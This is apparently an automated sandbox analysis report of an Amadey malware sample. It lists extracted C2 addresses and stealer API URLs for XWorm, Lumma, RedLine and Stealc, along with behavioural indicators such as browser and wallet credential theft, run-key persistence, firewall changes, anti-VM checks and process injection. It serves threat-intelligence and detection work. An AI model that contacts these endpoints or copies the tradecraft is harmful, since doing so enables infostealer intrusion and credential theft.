amadey | cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d

Analysis

max time kernel
69s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14-12-2024 13:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

xworm

157.66.26.208:8848

Attributes

install_file
USB.exe

Extracted

Family

lumma

https://p3ar11fter.sbs/api

https://3xp3cts1aim.sbs/api

https://owner-vacat10n.sbs/api

https://peepburry828.sbs/api

https://p10tgrace.sbs/api

https://befall-sm0ker.sbs/api

https://librari-night.sbs/api

https://processhol.sbs/api

Extracted

Family

redline

Botnet

eewx

185.81.68.147:1912

Extracted

Family

xworm

Version

5.0

62.113.117.95:5665

Mutex

oQNXB2TbsZoFMnfW

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

stealc

Botnet

Voov1

http://154.216.17.90

Attributes

url_path
/a48146f6763ef3af.php

Extracted

Family

lumma

https://drive-connect.cyou/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral2/files/0x000a000000023b7d-17.dat	family_xworm
behavioral2/memory/2920-25-0x0000000000C40000-0x0000000000C96000-memory.dmp	family_xworm
behavioral2/files/0x0009000000023c22-1420.dat	family_xworm
behavioral2/memory/4076-1529-0x00000000002D0000-0x0000000000320000-memory.dmp	family_xworm
behavioral2/files/0x000a000000023c57-3073.dat	family_xworm

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral2/files/0x000300000001e5ac-4518.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000e000000023bb0-1232.dat	family_redline
behavioral2/memory/1364-1245-0x0000000000150000-0x00000000001A2000-memory.dmp	family_redline

Redline family
redline
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 324 created 3008	324	pothjmawdtrg.exe	50

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x0007000000023ce6-4442.dat	family_asyncrat

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x000300000001e646-4550.dat	dcrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	x6uvjuko.exe

Blocklisted process makes network request 12 IoCs

flow	pid	Process
74	2520	rundll32.exe
75	2520	rundll32.exe
101	2240	rundll32.exe
102	2240	rundll32.exe
112	4768	rundll32.exe
114	4768	rundll32.exe
121	5612	rundll32.exe
122	5612	rundll32.exe
129	5516	rundll32.exe
131	5516	rundll32.exe
132	4300	rundll32.exe
133	4300	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
872	powershell.exe
3532	powershell.exe
4616	powershell.exe
548	powershell.exe
3344	powershell.exe
5500	powershell.exe
816	powershell.exe
6084	powershell.exe
5080	powershell.exe
1652	powershell.exe
1976	powershell.exe
3148	Powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	phost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
6368	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	x6uvjuko.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	x6uvjuko.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	ctx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Ukodbcdcl.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Gxtuum.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4296	cmd.exe
5116	powershell.exe

Executes dropped EXE 30 IoCs

pid	Process
2840	TPB-1.exe
2920	Client-built.exe
1056	Ukodbcdcl.exe
1388	x6uvjuko.exe
2212	ctx.exe
3680	Gxtuum.exe
436	Ukodbcdcl.exe
1364	ssg.exe
3220	rrq.exe
384	update.exe
324	pothjmawdtrg.exe
1684	2C1C.tmp.ssg.exe
816	zq6a1iqg.exe
2440	BaddStore.exe
4076	._cache_aspnet_regiis.exe
4020	Synaptics.exe
5008	phost.exe
384	phost.exe
2372	krgawdtyjawd.exe
1224	534D.tmp.zx.exe
3776	534D.tmp.zx.exe
5796	rar.exe
1496	lqxhbat.exe
1372	Gxtuum.exe
5844	lqxhbat.exe
5812	NBYS%20AH.NET.exe
2604	lega.exe
1692	lega.exe
5804	Update.exe
5600	mthimskef.exe

Loads dropped DLL 30 IoCs

pid	Process
4488	rundll32.exe
2520	rundll32.exe
2440	BaddStore.exe
3652	rundll32.exe
2240	rundll32.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
384	phost.exe
3776	534D.tmp.zx.exe
3776	534D.tmp.zx.exe
3776	534D.tmp.zx.exe
3776	534D.tmp.zx.exe
3776	534D.tmp.zx.exe
4768	rundll32.exe
5612	rundll32.exe
5516	rundll32.exe
4300	rundll32.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nvaurnhq = "C:\\Users\\Admin\\AppData\\Roaming\\Nvaurnhq.exe"	Ukodbcdcl.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\E2A533FC77502360809691\\E2A533FC77502360809691.exe"	update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\E2A533FC77502360809691\\E2A533FC77502360809691.exe"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\E2A533FC77502360809691\\E2A533FC77502360809691.exe"	audiodg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	aspnet_regiis.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	x6uvjuko.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
21	raw.githubusercontent.com
23	raw.githubusercontent.com
125	discord.com
126	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
108	ip-api.com
123	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000a000000023c68-3217.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 7 IoCs

discovery

Process Discovery

T1057

pid	Process
4052	tasklist.exe
1832	tasklist.exe
5340	tasklist.exe
6052	tasklist.exe
5876	tasklist.exe
4964	tasklist.exe
1056	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1388	x6uvjuko.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 1056 set thread context of 436	1056	Ukodbcdcl.exe	105
PID 384 set thread context of 4084	384	update.exe	119
PID 384 set thread context of 2916	384	update.exe	120
PID 384 set thread context of 2320	384	update.exe	121
PID 2440 set thread context of 2348	2440	BaddStore.exe	128
PID 816 set thread context of 5248	816	zq6a1iqg.exe	269
PID 1496 set thread context of 5844	1496	lqxhbat.exe	271
PID 2604 set thread context of 1692	2604	lega.exe	279

UPX packed file 39 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c6f-1601.dat	upx
behavioral2/memory/384-1605-0x00007FFB419D0000-0x00007FFB420A0000-memory.dmp	upx
behavioral2/files/0x0008000000023c5a-1620.dat	upx
behavioral2/memory/384-1623-0x00007FFB563A0000-0x00007FFB563AF000-memory.dmp	upx
behavioral2/memory/384-1622-0x00007FFB4DFA0000-0x00007FFB4DFC5000-memory.dmp	upx
behavioral2/memory/384-1628-0x00007FFB43330000-0x00007FFB4335D000-memory.dmp	upx
behavioral2/memory/384-1630-0x00007FFB414A0000-0x00007FFB419C2000-memory.dmp	upx
behavioral2/memory/384-1629-0x00007FFB53180000-0x00007FFB53195000-memory.dmp	upx
behavioral2/memory/384-1632-0x00007FFB43300000-0x00007FFB43324000-memory.dmp	upx
behavioral2/memory/384-1633-0x00007FFB41320000-0x00007FFB41497000-memory.dmp	upx
behavioral2/memory/384-1631-0x00007FFB52EE0000-0x00007FFB52EF9000-memory.dmp	upx
behavioral2/memory/384-1638-0x00007FFB41210000-0x00007FFB412DD000-memory.dmp	upx
behavioral2/memory/384-1639-0x00007FFB53290000-0x00007FFB5329D000-memory.dmp	upx
behavioral2/memory/384-1646-0x00007FFB410F0000-0x00007FFB4120B000-memory.dmp	upx
behavioral2/memory/384-1645-0x00007FFB4DFA0000-0x00007FFB4DFC5000-memory.dmp	upx
behavioral2/memory/384-1637-0x00007FFB412E0000-0x00007FFB41313000-memory.dmp	upx
behavioral2/memory/384-1636-0x00007FFB53600000-0x00007FFB5360D000-memory.dmp	upx
behavioral2/memory/384-1635-0x00007FFB48550000-0x00007FFB48569000-memory.dmp	upx
behavioral2/memory/384-1634-0x00007FFB419D0000-0x00007FFB420A0000-memory.dmp	upx
behavioral2/memory/384-1727-0x00007FFB53180000-0x00007FFB53195000-memory.dmp	upx
behavioral2/memory/384-1769-0x00007FFB414A0000-0x00007FFB419C2000-memory.dmp	upx
behavioral2/memory/384-1800-0x00007FFB43300000-0x00007FFB43324000-memory.dmp	upx
behavioral2/memory/384-1866-0x00007FFB41320000-0x00007FFB41497000-memory.dmp	upx
behavioral2/memory/384-1868-0x00007FFB412E0000-0x00007FFB41313000-memory.dmp	upx
behavioral2/memory/384-1888-0x00007FFB41210000-0x00007FFB412DD000-memory.dmp	upx
behavioral2/memory/384-3000-0x00007FFB414A0000-0x00007FFB419C2000-memory.dmp	upx
behavioral2/memory/384-3007-0x00007FFB43300000-0x00007FFB43324000-memory.dmp	upx
behavioral2/memory/384-3011-0x00007FFB412E0000-0x00007FFB41313000-memory.dmp	upx
behavioral2/memory/384-3010-0x00007FFB53600000-0x00007FFB5360D000-memory.dmp	upx
behavioral2/memory/384-3009-0x00007FFB48550000-0x00007FFB48569000-memory.dmp	upx
behavioral2/memory/384-3008-0x00007FFB41320000-0x00007FFB41497000-memory.dmp	upx
behavioral2/memory/384-3006-0x00007FFB52EE0000-0x00007FFB52EF9000-memory.dmp	upx
behavioral2/memory/384-3005-0x00007FFB41210000-0x00007FFB412DD000-memory.dmp	upx
behavioral2/memory/384-3004-0x00007FFB53180000-0x00007FFB53195000-memory.dmp	upx
behavioral2/memory/384-3003-0x00007FFB43330000-0x00007FFB4335D000-memory.dmp	upx
behavioral2/memory/384-3002-0x00007FFB4DFA0000-0x00007FFB4DFC5000-memory.dmp	upx
behavioral2/memory/384-3001-0x00007FFB563A0000-0x00007FFB563AF000-memory.dmp	upx
behavioral2/files/0x0010000000023ad3-4126.dat	upx
behavioral2/files/0x0005000000022eb3-4406.dat	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Gxtuum.job	ctx.exe
File created	C:\Windows\Tasks\Test Task17.job	Ukodbcdcl.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0009000000023c52-1644.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
1076	5812	WerFault.exe	272
3968	2372	WerFault.exe	140
6872	7056	WerFault.exe	372

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NBYS%20AH.NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TPB-1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2C1C.tmp.ssg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lqxhbat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pothjmawdtrg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BaddStore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	krgawdtyjawd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lqxhbat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x6uvjuko.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lega.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ukodbcdcl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ctx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ukodbcdcl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lega.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zq6a1iqg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ssg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mthimskef.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2604	netsh.exe
1276	cmd.exe
5324	netsh.exe
3076	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	krgawdtyjawd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	krgawdtyjawd.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
544	timeout.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4880	WMIC.exe
764	WMIC.exe
5424	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5352	systeminfo.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	302	Go-http-client/1.1

Kills process with taskkill 5 IoCs

evasion

pid	Process
5904	taskkill.exe
2372	taskkill.exe
2388	taskkill.exe
5928	taskkill.exe
2188	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	aspnet_regiis.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2732	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1388	x6uvjuko.exe
1388	x6uvjuko.exe
2328	powershell.exe
2328	powershell.exe
2520	rundll32.exe
2520	rundll32.exe
2520	rundll32.exe
2520	rundll32.exe
2520	rundll32.exe
2520	rundll32.exe
2520	rundll32.exe
2520	rundll32.exe
2520	rundll32.exe
2520	rundll32.exe
2520	rundll32.exe
2520	rundll32.exe
1652	powershell.exe
1652	powershell.exe
1652	powershell.exe
2916	msiexec.exe
2916	msiexec.exe
2916	msiexec.exe
2916	msiexec.exe
2916	msiexec.exe
2916	msiexec.exe
2916	msiexec.exe
2916	msiexec.exe
2916	msiexec.exe
2916	msiexec.exe
2916	msiexec.exe
2916	msiexec.exe
4084	svchost.exe
4084	svchost.exe
2916	msiexec.exe
2916	msiexec.exe
3436	Explorer.EXE
3436	Explorer.EXE
2916	msiexec.exe
2916	msiexec.exe
2916	msiexec.exe
2916	msiexec.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
2320	audiodg.exe
3220	rrq.exe
3220	rrq.exe
3220	rrq.exe
3220	rrq.exe
324	pothjmawdtrg.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2584	4363463463464363463463463.exe
Token: SeDebugPrivilege	1056	Ukodbcdcl.exe
Token: SeDebugPrivilege	2920	Client-built.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	1056	Ukodbcdcl.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeIncreaseQuotaPrivilege	384	update.exe
Token: SeSecurityPrivilege	384	update.exe
Token: SeTakeOwnershipPrivilege	384	update.exe
Token: SeLoadDriverPrivilege	384	update.exe
Token: SeSystemProfilePrivilege	384	update.exe
Token: SeSystemtimePrivilege	384	update.exe
Token: SeProfSingleProcessPrivilege	384	update.exe
Token: SeIncBasePriorityPrivilege	384	update.exe
Token: SeCreatePagefilePrivilege	384	update.exe
Token: SeBackupPrivilege	384	update.exe
Token: SeRestorePrivilege	384	update.exe
Token: SeShutdownPrivilege	384	update.exe
Token: SeDebugPrivilege	384	update.exe
Token: SeSystemEnvironmentPrivilege	384	update.exe
Token: SeRemoteShutdownPrivilege	384	update.exe
Token: SeUndockPrivilege	384	update.exe
Token: SeManageVolumePrivilege	384	update.exe
Token: 33	384	update.exe
Token: 34	384	update.exe
Token: 35	384	update.exe
Token: 36	384	update.exe
Token: SeIncreaseQuotaPrivilege	2916	msiexec.exe
Token: SeSecurityPrivilege	2916	msiexec.exe
Token: SeTakeOwnershipPrivilege	2916	msiexec.exe
Token: SeLoadDriverPrivilege	2916	msiexec.exe
Token: SeSystemProfilePrivilege	2916	msiexec.exe
Token: SeSystemtimePrivilege	2916	msiexec.exe
Token: SeProfSingleProcessPrivilege	2916	msiexec.exe
Token: SeIncBasePriorityPrivilege	2916	msiexec.exe
Token: SeCreatePagefilePrivilege	2916	msiexec.exe
Token: SeBackupPrivilege	2916	msiexec.exe
Token: SeRestorePrivilege	2916	msiexec.exe
Token: SeShutdownPrivilege	2916	msiexec.exe
Token: SeDebugPrivilege	2916	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2916	msiexec.exe
Token: SeRemoteShutdownPrivilege	2916	msiexec.exe
Token: SeUndockPrivilege	2916	msiexec.exe
Token: SeManageVolumePrivilege	2916	msiexec.exe
Token: 33	2916	msiexec.exe
Token: 34	2916	msiexec.exe
Token: 35	2916	msiexec.exe
Token: 36	2916	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4084	svchost.exe
Token: SeSecurityPrivilege	4084	svchost.exe
Token: SeTakeOwnershipPrivilege	4084	svchost.exe
Token: SeLoadDriverPrivilege	4084	svchost.exe
Token: SeSystemProfilePrivilege	4084	svchost.exe
Token: SeSystemtimePrivilege	4084	svchost.exe
Token: SeProfSingleProcessPrivilege	4084	svchost.exe
Token: SeIncBasePriorityPrivilege	4084	svchost.exe
Token: SeCreatePagefilePrivilege	4084	svchost.exe
Token: SeBackupPrivilege	4084	svchost.exe
Token: SeRestorePrivilege	4084	svchost.exe
Token: SeShutdownPrivilege	4084	svchost.exe
Token: SeDebugPrivilege	4084	svchost.exe
Token: SeSystemEnvironmentPrivilege	4084	svchost.exe
Token: SeRemoteShutdownPrivilege	4084	svchost.exe
Token: SeUndockPrivilege	4084	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2212	ctx.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2584 wrote to memory of 2840	2584	4363463463464363463463463.exe	84
PID 2584 wrote to memory of 2840	2584	4363463463464363463463463.exe	84
PID 2584 wrote to memory of 2840	2584	4363463463464363463463463.exe	84
PID 2584 wrote to memory of 2920	2584	4363463463464363463463463.exe	86
PID 2584 wrote to memory of 2920	2584	4363463463464363463463463.exe	86
PID 2584 wrote to memory of 1056	2584	4363463463464363463463463.exe	87
PID 2584 wrote to memory of 1056	2584	4363463463464363463463463.exe	87
PID 2584 wrote to memory of 1056	2584	4363463463464363463463463.exe	87
PID 2584 wrote to memory of 1388	2584	4363463463464363463463463.exe	93
PID 2584 wrote to memory of 1388	2584	4363463463464363463463463.exe	93
PID 2584 wrote to memory of 1388	2584	4363463463464363463463463.exe	93
PID 2584 wrote to memory of 2212	2584	4363463463464363463463463.exe	95
PID 2584 wrote to memory of 2212	2584	4363463463464363463463463.exe	95
PID 2584 wrote to memory of 2212	2584	4363463463464363463463463.exe	95
PID 2212 wrote to memory of 3680	2212	ctx.exe	97
PID 2212 wrote to memory of 3680	2212	ctx.exe	97
PID 2212 wrote to memory of 3680	2212	ctx.exe	97
PID 1056 wrote to memory of 2328	1056	Ukodbcdcl.exe	103
PID 1056 wrote to memory of 2328	1056	Ukodbcdcl.exe	103
PID 1056 wrote to memory of 2328	1056	Ukodbcdcl.exe	103
PID 1056 wrote to memory of 436	1056	Ukodbcdcl.exe	105
PID 1056 wrote to memory of 436	1056	Ukodbcdcl.exe	105
PID 1056 wrote to memory of 436	1056	Ukodbcdcl.exe	105
PID 1056 wrote to memory of 436	1056	Ukodbcdcl.exe	105
PID 1056 wrote to memory of 436	1056	Ukodbcdcl.exe	105
PID 1056 wrote to memory of 436	1056	Ukodbcdcl.exe	105
PID 1056 wrote to memory of 436	1056	Ukodbcdcl.exe	105
PID 1056 wrote to memory of 436	1056	Ukodbcdcl.exe	105
PID 3680 wrote to memory of 1364	3680	Gxtuum.exe	106
PID 3680 wrote to memory of 1364	3680	Gxtuum.exe	106
PID 3680 wrote to memory of 1364	3680	Gxtuum.exe	106
PID 3680 wrote to memory of 4488	3680	Gxtuum.exe	107
PID 3680 wrote to memory of 4488	3680	Gxtuum.exe	107
PID 3680 wrote to memory of 4488	3680	Gxtuum.exe	107
PID 4488 wrote to memory of 2520	4488	rundll32.exe	108
PID 4488 wrote to memory of 2520	4488	rundll32.exe	108
PID 2520 wrote to memory of 3076	2520	rundll32.exe	109
PID 2520 wrote to memory of 3076	2520	rundll32.exe	109
PID 2520 wrote to memory of 1652	2520	rundll32.exe	111
